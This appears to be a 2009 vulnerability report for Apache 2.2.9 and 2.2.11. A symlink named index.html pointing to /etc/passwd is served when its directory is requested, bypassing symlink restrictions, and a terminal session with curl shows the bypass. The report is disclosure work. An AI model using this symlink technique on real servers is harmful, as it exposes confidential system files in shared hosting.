Apache ignores SymLinksIfOwnerMatch- and FollowSymlinks-directives if the name of the symlink in question matches a valid value for DirectoryIndex.


Expected behaviour: 403 Forbidden, the symlink's target should not be delivered.

Observed behaviour: 200 OK, the symlink's target is delivered to the client.


Impact: this could prove a security problem, especially in shared hosting environments. It is possible to disclose confidential information by arbitrarily creating symlinks to files readable by the apache process.


Demonstration:
--- snip ---
xy@v1384:~/dev/test$ ls -la . /etc/passwd
-rw-r--r-- 1 root root 1570 2009-03-23 11:06 /etc/passwd

.:
total 3
drwxr-xr-x 2 xy xy 1024 2009-06-09 16:50 .
drwxr-xr-x 5 xy xy 1024 2009-06-09 16:31 ..
-rw-r--r-- 1 xy xy   29 2009-06-09 16:48 .htaccess
lrwxrwxrwx 1 xy xy   11 2009-06-09 16:47 index.html -> /etc/passwd
lrwxrwxrwx 1 xy xy   11 2009-06-09 16:50 symlink -> /etc/passwd

xy@v1384:~/dev/test$ cat .htaccess
Options SymLinksIfOwnerMatch

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/symlink
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:36:52 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/index.html
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:37:00 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

xy@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/
HTTP/1.1 200 OK
Date: Tue, 09 Jun 2009 15:37:03 GMT
Server: Apache
Last-Modified: Mon, 23 Mar 2009 10:06:27 GMT
ETag: "f979d3e-622-465c66b6bcec0"
Accept-Ranges: bytes
Content-Length: 1570
Content-Type: text/html
--- snip ---


The above behaviour is the same if FollowSymlinks, instead of SymLinksIfOwnerMatch, is used to restrict access.
This is reproducible on Apache 2.2.9 (Debian Stable) and 2.2.11 (Gentoo ~x86).